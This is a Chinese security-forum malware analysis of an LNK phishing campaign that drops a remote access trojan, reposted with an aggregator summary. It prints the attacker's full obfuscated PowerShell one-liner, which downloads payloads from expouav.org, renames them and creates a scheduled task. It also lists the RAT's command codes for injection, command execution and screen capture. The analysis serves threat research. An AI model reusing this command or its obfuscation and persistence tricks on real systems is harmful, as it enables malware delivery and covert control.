看雪学院 09月20日
利用LNK文件钓鱼,分发恶意软件的攻击手法
index_new5.html
../../../zaker_core/zaker_tpl_static/wap/tpl_guoji1.html

 

本文揭示了一种利用LNK文件进行钓鱼攻击的新手法。攻击者通过伪装成PDF文件的恶意LNK文件,诱导受害者点击,从而执行PowerShell命令。该命令会从指定网站下载多个文件,包括看似正常的PDF、播放器文件(vlc.exe)、恶意DLL库(libvlc.dll)、系统工具(Winver.exe)以及加密的shellcode文件。随后,攻击者利用Winver创建计划任务来执行vlc.exe,并加载恶意的libvlc.dll,最终解密并执行shellcode,释放远程访问木马(RAT)。文章详细分析了RAT的隐藏窗口、互斥体创建、用户信息收集、加密通信以及支持的多种远程命令,如文件上传下载、命令执行、远程线程注入和屏幕监控等。

🎣 **LNK文件钓鱼新手法**:攻击者通过发送伪装成PDF的恶意LNK文件来发起钓鱼攻击。一旦受害者点击,便会触发PowerShell命令,该命令负责后续的恶意软件下载和执行过程,是此次攻击的初始入口。

💻 **多文件下载与组件加载**:恶意PowerShell脚本会从`expouav.org`下载多个文件,包括一个伪装的PDF、合法的vlc.exe、恶意的libvlc.dll、系统工具Winver.exe以及加密的shellcode。攻击者巧妙地利用Winver创建计划任务来执行vlc.exe,并使其加载libvlc.dll,实现对恶意代码的隐蔽加载。

🕵️ **RAT行为分析与远程控制**:最终释放的远程访问木马(RAT)具备多种恶意功能,包括隐藏窗口、创建唯一实例、收集用户信息(如用户名、计算机名、IP地址)、通过Base64编码和AES加密发送注册包,并支持多种远程命令,如文件上传下载、CMD命令执行、远程线程注入、APC注入、屏幕监控等,展现了其强大的远程控制能力。

🔗 **参考与拓展**:文章提供了详细的PowerShell命令和RAT的逆向分析过程,并附带了相关参考链接,有助于安全研究人员深入理解此类攻击的原理和防护方法。同时,也提示了Elephant APT组织可能与此类攻击有关联。

之健 2025-09-13 17:59 上海

看雪论坛作者ID:之健

初始入侵lnk文件钓鱼

威胁行为者通过发送带有恶意lnk文件的钓鱼邮件来发起攻击。lnk文件伪装为pdf文件诱导受害者点击,当受害者点击后会通过Pester.bat执行恶意的power shell命令。

命令如下:

"C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat" ;powershell s''l''eep 1;$ProgressPreference ='SilentlyContinue';$a='https:';$b='C:\Users\';$c='C:\Windows\';wg''et $a//expouav.org/download/fetch/list3/12717/view/0d5a0411-0a85-42cf-928c-dd9218019f3b -OutFile $b\Public\Unmanned_Vehicle_Systems_Conference_2025_In_Istanbul.pdf;s''ap''s "$b\Public\Unmanned_Vehicle_Systems_Conference_2025_In_Istanbul.pdf";wg''et $a//expouav.org/download/fetch/list7/40275/view/e49c7ae0-f3d1-4073-83bb-b4ecba929fec -Outfile $c\Tasks\lama;r''e''-Path "$c\Tasks\lama" -NewName "$c\Tasks\vlc.pepxpe";r''e''-Path "$c\Tasks\vlc.pepxpe" -NewName ((Split-Path "$c\Tasks\vlc.pepxpe" -Leaf) -replace "p", "");wg''et $a//expouav.org/download/fetch/list5/19577/view/b5aaa6f0-6259-4ccb-b31a-d21e40c2eeff -Outfile $c\Tasks\lake;r''e''-Path "$c\Tasks\lake" -NewName "$c\Tasks\libvlc.pdplpl";r''e''-Path "$c\Tasks\libvlc.pdplpl" -NewName ((Split-Path "$c\Tasks\libvlc.pdplpl" -Leaf) -replace "p", "");wg''et $a//expouav.org/download/fetch/list6/41568/view/701bbff4-8fcb-4e9c-8577-00aed06d8443 -Outfile $c\Tasks\dalai;r''e''-Path "$c\Tasks\dalai" -NewName "$c\Tasks\Winver.pepxpe";r''e''-Path "$c\Tasks\Winver.pepxpe" -NewName ((Split-Path "$c\Tasks\Winver.pepxpe" -Leaf) -replace "p", "");c''p''i "$b\Public\Unmanned_Vehicle_Systems_Conference_2025_In_Istanbul.pdf" -destination .;wg''et $a//expouav.org/download/fetch/list8/20041/view/c6795195-6e84-4720-9420-e03da09b2187 -OutFile $c\Tasks\vlc.log;$d="$c\Tasks\Winver";s''ap''s $d -a "/Create", '/sc''minute''/tn''NewErrorReport''/tr', "$c\Tasks\vlc", '/f';e''r''a''s''*d?.?n?

powershell 脚本通过在expouav.org下载多个文件。

具体下载的文件信息如下1、欺骗显示的pdf正常文件Unmanned_Vehicle_Systems_Conference_2025_In_Istanbul.pdf2、合法的播放器文件vlc.exe3、恶意的dll库libvlc.dll4、合法的Microsoft任务计划程序Winver.exe5、加密的shellcode文件vlc.log通过下载的Winver 文件创建计划任务执行vlc文件。然后通过合法的vlc.exe加载恶意的libvlc.dll库,解密执行shellcode。由于未下载到shellcode文件,以下对shellcode释放的最终负载RAT做分析。

RAT逆向分析

隐藏窗口

唯一实例

创建互斥体ghjghkj

获取用户信息发送注册包

部分信息如下

用户名

计算机名

本地IP与出口IP地址

创建线程通过HTTP发送注册包

数据发送前经过base64编码与aes加密

base64

aes

命令执行循环

发送cuud 包获取命令

命令3Up3:上传文件,可执行

命令3gjdfghj6:执行CMD命令

命令3ngjfng5:下载文件

命令3CRT3:远程线程注入执行

命令3APC3:APC注入执行

命令3SC3:屏幕监控

参考链接

https://arcticwolf.com/resources/blog/dropping-elephant-apt-group-targets-turkish-defense-industry

*本文为看雪论坛优秀文章,由 之健 原创,转载请注明来自看雪社区

1.25折早鸟票开售!9月23日截止

球分享

球点赞

球在看

点击阅读原文查看更多

阅读原文

跳转微信打开

Fish AI Reader

Fish AI Reader

AI辅助创作,多种专业模板,深度分析,高质量内容生成。从观点提取到深度思考,FishAI为您提供全方位的创作支持。新版本引入自定义参数,让您的创作更加个性化和精准。

FishAI

FishAI

鱼阅,AI 时代的下一个智能信息助手,助你摆脱信息焦虑

联系邮箱 441953276@qq.com

相关标签

LNK文件 钓鱼攻击 PowerShell RAT 恶意软件 网络安全 APT LNK File Phishing Malware Cybersecurity
相关文章